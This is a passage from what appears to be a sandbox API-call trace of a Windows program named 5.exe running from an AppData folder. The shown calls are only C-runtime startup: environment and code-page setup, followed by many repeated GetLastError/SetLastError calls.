0x6c907d0 [0125.566] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0125.567] GetCurrentThreadId () returned 0xae8 [0125.567] GetStartupInfoW (in: lpStartupInfo=0x18dd98 | out: lpStartupInfo=0x18dd98*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x45d5a0, hStdOutput=0x45d8d9, hStdError=0x6c907d0)) [0125.567] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x8, Size=0x800) returned 0x6c909f0 [0125.567] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0125.567] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0125.567] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0125.567] SetHandleCount (uNumber=0x20) returned 0x20 [0125.567] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\5.exe\" " [0125.567] GetEnvironmentStringsW () returned 0x53653d8* [0125.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0125.567] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x565) returned 0x6c911f8 [0125.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x6c911f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0125.567] FreeEnvironmentStringsW (penv=0x53653d8) returned 1 [0125.567] GetLastError () returned 0x0 [0125.567] SetLastError (dwErrCode=0x0) [0125.567] GetLastError () returned 0x0 [0125.568] SetLastError (dwErrCode=0x0) [0125.568] GetLastError () returned 0x0 [0125.568] SetLastError (dwErrCode=0x0) [0125.568] GetACP () returned 0x4e4 [0125.568] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x220) returned 0x6c91768 [0125.568] GetLastError () returned 0x0 [0125.568] SetLastError (dwErrCode=0x0) [0125.568] IsValidCodePage (CodePage=0x4e4) returned 1 [0125.568] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18dd60 | out: lpCPInfo=0x18dd60) returned 1 [0125.568] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18d82c | out: lpCPInfo=0x18d82c) returned 1 [0125.568] GetLastError () returned 0x0 [0125.568] SetLastError (dwErrCode=0x0) [0125.568] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18dc40, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0125.568] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18dc40, cbMultiByte=256, lpWideCharStr=0x18d5a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䈴䐆廄FĀ") returned 256 [0125.568] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䈴䐆廄FĀ", cchSrc=256, lpCharType=0x18d840 | out: lpCharType=0x18d840) returned 1 [0125.568] GetLastError () returned 0x0 [0125.568] SetLastError (dwErrCode=0x0) [0125.568] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18dc40, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0125.568] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18dc40, cbMultiByte=256, lpWideCharStr=0x18d578, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ귈EĀ") returned 256 [0125.568] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ귈EĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0125.568] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ귈EĀ", cchSrc=256, lpDestStr=0x18d368, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0125.569] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18db40, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿcÿPZxÝ\x18", lpUsedDefaultChar=0x0) returned 256 [0125.569] GetLastError () returned 0x0 [0125.569] SetLastError (dwErrCode=0x0) [0125.569] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18dc40, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0125.569] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18dc40, cbMultiByte=256, lpWideCharStr=0x18d598, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ귈EĀ") returned 256 [0125.569] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ귈EĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0125.569] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ귈EĀ", cchSrc=256, lpDestStr=0x18d388, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0125.569] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18da40, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿcÿPZxÝ\x18", lpUsedDefaultChar=0x0) returned 256 [0125.569] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x489df8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\5.exe")) returned 0x56 [0125.569] GetLastError () returned 0x0 [0125.569] SetLastError (dwErrCode=0x0) [0125.569] GetLastError () returned 0x0 [0125.569] SetLastError (dwErrCode=0x0) [0125.569] GetLastError () returned 0x0 [0125.569] SetLastError (dwErrCode=0x0) [0125.569] GetLastError () returned 0x0 [0125.569] SetLastError (dwErrCode=0x0) [0125.569] GetLastError () returned 0x0 [0125.570] SetLastError (dwErrCode=0x0) [0125.570] GetLastError () returned 0x0 [0125.570] SetLastError (dwErrCode=0x0) [0125.570] GetLastError () returned 0x0 [0125.577] SetLastError (dwErrCode=0x0) [0125.577] GetLastError () returned 0x0 [0125.577] SetLastError (dwErrCode=0x0) [0125.577] GetLastError () returned 0x0 [0125.577] SetLastError (dwErrCode=0x0) [0125.577] GetLastError () returned 0x0 [0125.577] SetLastError (dwErrCode=0x0) [0125.577] GetLastError () returned 0x0 [0125.577] SetLastError (dwErrCode=0x0) [0125.577] GetLastError () returned 0x0 [0125.577] SetLastError (dwErrCode=0x0) [0125.577] GetLastError () returned 0x0 [0125.577] SetLastError (dwErrCode=0x0) [0125.577] GetLastError () returned 0x0 [0125.578] SetLastError (dwErrCode=0x0) [0125.578] GetLastError () returned 0x0 [0125.578] SetLastError (dwErrCode=0x0) [0125.578] GetLastError () returned 0x0 [0125.578] SetLastError (dwErrCode=0x0) [0125.578] GetLastError () returned 0x0 [0125.578] SetLastError (dwErrCode=0x0) [0125.578] GetLastError () returned 0x0 [0125.578] SetLastError (dwErrCode=0x0) [0125.578] GetLastError () returned 0x0 [0125.578] SetLastError (dwErrCode=0x0) [0125.578] GetLastError () returned 0x0 [0125.578] SetLastError (dwErrCode=0x0) [0125.578] GetLastError () returned 0x0 [0125.578] SetLastError (dwErrCode=0x0) [0125.578] GetLastError () returned 0x0 [0125.578] SetLastError (dwErrCode=0x0) [0125.578] GetLastError () returned 0x0 [0125.578] SetLastError (dwErrCode=0x0) [0125.578] GetLastError () returned 0x0 [0125.578] SetLastError (dwErrCode=0x0) [0125.578] GetLastError () returned 0x0 [0125.579] SetLastError (dwErrCode=0x0) [0125.579] GetLastError () returned 0x0 [0125.579] SetLastError (dwErrCode=0x0) [0125.579] GetLastError () returned 0x0 [0125.579] SetLastError (dwErrCode=0x0) [0125.579] GetLastError () returned 0x0 [0125.579] SetLastError (dwErrCode=0x0) [0125.579] GetLastError () returned 0x0 [0125.579] SetLastError (dwErrCode=0x0) [0125.579] GetLastError () returned 0x0 [0125.579] SetLastError (dwErrCode=0x0) [0125.579] GetLastError () returned 0x0 [0125.579] SetLastError (dwErrCode=0x0) [0125.579] GetLastError () returned 0x0 [0125.579] SetLastError (dwErrCode=0x0) [0125.579] GetLastError () returned 0x0 [0125.579] SetLastError (dwErrCode=0x0) [0125.579] GetLastError () returned 0x0 [0125.579] SetLastError (dwErrCode=0x0) [0125.579] GetLastError () returned 0x0 [0125.579] SetLastError (dwErrCode=0x0) [0125.580] GetLastError () returned 0x0 [0125.580] SetLastError (dwErrCode=0x0) [0125.580] GetLastError () returned 0x0 [0125.580] SetLastError (dwErrCode=0x0) [0125.580] GetLastError () returned 0x0 [0125.580] SetLastError (dwErrCode=0x0) [0125.580] GetLastError () returned 0x0 [0125.580] SetLastError (dwErrCode=0x0) [0125.580] GetLastError () returned 0x0 [0125.580] SetLastError (dwErrCode=0x0) [0125.580] GetLastError () returned 0x0 [0125.580] SetLastError (dwErrCode=0x0) [0125.580] GetLastError () returned 0x0 [0125.580] SetLastError (dwErrCode=0x0) [0125.580] GetLastError () returned 0x0 [0125.580] SetLastError (dwErrCode=0x0) [0125.580] GetLastError () returned 0x0 [0125.580] SetLastError (dwErrCode=0x0) [0125.580] GetLastError () returned 0x0 [0125.580] SetLastError (dwErrCode=0x0) [0125.581] GetLastError () returned 0x0 [0125.581] SetLastError (dwErrCode=0x0) [0125.581] GetLastError () returned 0x0 [0125.581] SetLastError (dwErrCode=0x0) [0125.581] GetLastError () returned 0x0 [0125.581] SetLastError (dwErrCode=0x0) [0125.581] GetLastError () returned 0x0 [0125.581] SetLastError (dwErrCode=0x0) [0125.581] GetLastError () returned 0x0 [0125.581] SetLastError (dwErrCode=0x0) [0125.581] GetLastError () returned 0x0 [0125.581] SetLastError (dwErrCode=0x0) [0125.581] GetLastError () returned 0x0 [0125.581] SetLastError (dwErrCode=0x0) [0125.581] GetLastError () returned 0x0 [0125.581] SetLastError (dwErrCode=0x0) [0125.581] GetLastError () returned 0x0 [0125.581] SetLastError (dwErrCode=0x0) [0125.581] GetLastError () returned 0x0 [0125.582] SetLastError (dwErrCode=0x0) [0125.582] GetLastError () returned 0x0 [0125.582] SetLastError (dwErrCode=0x0) [0125.582] GetLastError () returned 0x0 [0125.582] SetLastError (dwErrCode=0x0) [0125.582] GetLastError () returned 0x0 [0125.582] SetLastError (dwErrCode=0x0) [0125.582] GetLastError () returned 0x0 [0125.582] SetLastError (dwErrCode=0x0) [0125.582] GetLastError () returned 0x0 [0125.582] SetLastError (dwErrCode=0x0) [0125.582] GetLastError () returned 0x0 [0125.582] SetLastError (dwErrCode=0x0) [0125.582] GetLastError () returned 0x0 [0125.582] SetLastError (dwErrCode=0x0) [0125.582] GetLastError () returned 0x0 [0125.582] SetLastError (dwErrCode=0x0) [0125.582] GetLastError () returned 0x0 [0125.582] SetLastError (dwErrCode=0x0) [0125.582] GetLastError () returned 0x0 [0125.583] SetLastError (dwErrCode=0x0) [0125.583] GetLastError () returned 0x0 [0125.583] SetLastError (dwErrCode=0x0) [0125.583] GetLastError () returned 0x0 [0125.583] SetLastError (dwErrCode=0x0) [0125.583] GetLastError () returned 0x0 [0125.583] SetLastError (dwErrCode=0x0) [0125.583] GetLastError () returned 0x0 [0125.583] SetLastError (dwErrCode=0x0) [0125.583] GetLastError () returned 0x0 [0125.583] SetLastError (dwErrCode=0x0) [0125.583] GetLastError () returned 0x0 [0125.583] SetLastError (dwErrCode=0x0) [0125.583] GetLastError () returned 0x0 [0125.583] SetLastError (dwErrCode=0x0) [0125.583] GetLastError () returned 0x0 [0125.583] SetLastError (dwErrCode=0x0) [0125.583] GetLastError () returned 0x0 [0125.583] SetLastError (dwErrCode=0x0) [0125.583] GetLastError () returned 0x0 [0125.583] SetLastError (dwErrCode=0x0) [0125.583] GetLastError () returned 0x0 [0125.584] SetLastError (dwErrCode=0x0) [0125.584] GetLastError () returned 0x0 [0125.584] SetLastError (dwErrCode=0x0) [0125.584] GetLastError () returned 0x0 [0125.584] SetLastError (dwErrCode=0x0) [0125.584] GetLastError () returned 0x0 [0125.584] SetLastError (dwErrCode=0x0) [0125.584] GetLastError () returned 0x0 [0125.584] SetLastError (dwErrCode=0x0) [0125.584] GetLastError () returned 0x0 [0125.584] SetLastError (dwErrCode=0x0) [0125.584] GetLastError () returned 0x0 [0125.584] SetLastError (dwErrCode=0x0) [0125.584] GetLastError () returned 0x0 [0125.584] SetLastError (dwErrCode=0x0) [0125.584] GetLastError () returned 0x0 [0125.584] SetLastError (dwErrCode=0x0) [0125.584] GetLastError () returned 0x0 [0125.584] SetLastError (dwErrCode=0x0) [0125.584] GetLastError () returned 0x0 [0125.584] SetLastError (dwErrCode=0x0) [0125.584] GetLastError () returned 0x0 [0125.585] SetLastError (dwErrCode=0x0) [0125.585] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x5f) returned 0x6c91990 [0125.585] GetLastError () returned 0x0 [0125.585] SetLastError (dwErrCode=0x0) [0125.585] GetLastError () returned 0x0 [0125.585] SetLastError (dwErrCode=0x0) [0125.585] GetLastError () returned 0x0 [0125.585] SetLastError (dwErrCode=0x0) [0125.585] GetLastError () returned 0x0 [0125.585] SetLastError (dwErrCode=0x0) [0125.585] GetLastError () returned 0x0 [0125.585] SetLastError (dwErrCode=0x0) [0125.585] GetLastError () returned 0x0 [0125.585] SetLastError (dwErrCode=0x0) [0125.585] GetLastError () returned 0x0 [0125.585] SetLastError (dwErrCode=0x0) [0125.585] GetLastError () returned 0x0 [0125.586] SetLastError (dwErrCode=0x0) [0125.586] GetLastError () returned 0x0 [0125.586] SetLastError (dwErrCode=0x0) [0125.586] GetLastError () returned 0x0 [0125.586] SetLastError (dwErrCode=0x0) [0125.586] GetLastError () returned 0x0 [0125.586] SetLastError (dwErrCode=0x0) [0125.586] GetLastError () returned 0x0 [0125.586] SetLastError (dwErrCode=0x0) [0125.586] GetLastError () returned 0x0 [0125.586] SetLastError (dwErrCode=0x0) [0125.586] GetLastError () returned 0x0 [0125.586] SetLastError (dwErrCode=0x0) [0125.586] GetLastError () returned 0x0 [0125.586] SetLastError (dwErrCode=0x0) [0125.586] GetLastError () returned 0x0 [0125.586] SetLastError (dwErrCode=0x0) [0125.586] GetLastError () returned 0x0 [0125.586] SetLastError (dwErrCode=0x0) [0125.586] GetLastError () returned 0x0 [0125.587] SetLastError (dwErrCode=0x0) [0125.587] GetLastError () returned 0x0 [0125.587] SetLastError (dwErrCode=0x0) [0125.587] GetLastError () returned 0x0 [0125.587] SetLastError (dwErrCode=0x0) [0125.587] GetLastError () returned 0x0 [0125.587] SetLastError (dwErrCode=0x0) [0125.587] GetLastError () returned 0x0 [0125.587] SetLastError (dwErrCode=0x0) [0125.587] GetLastError () returned 0x0 [0125.587] SetLastError (dwErrCode=0x0) 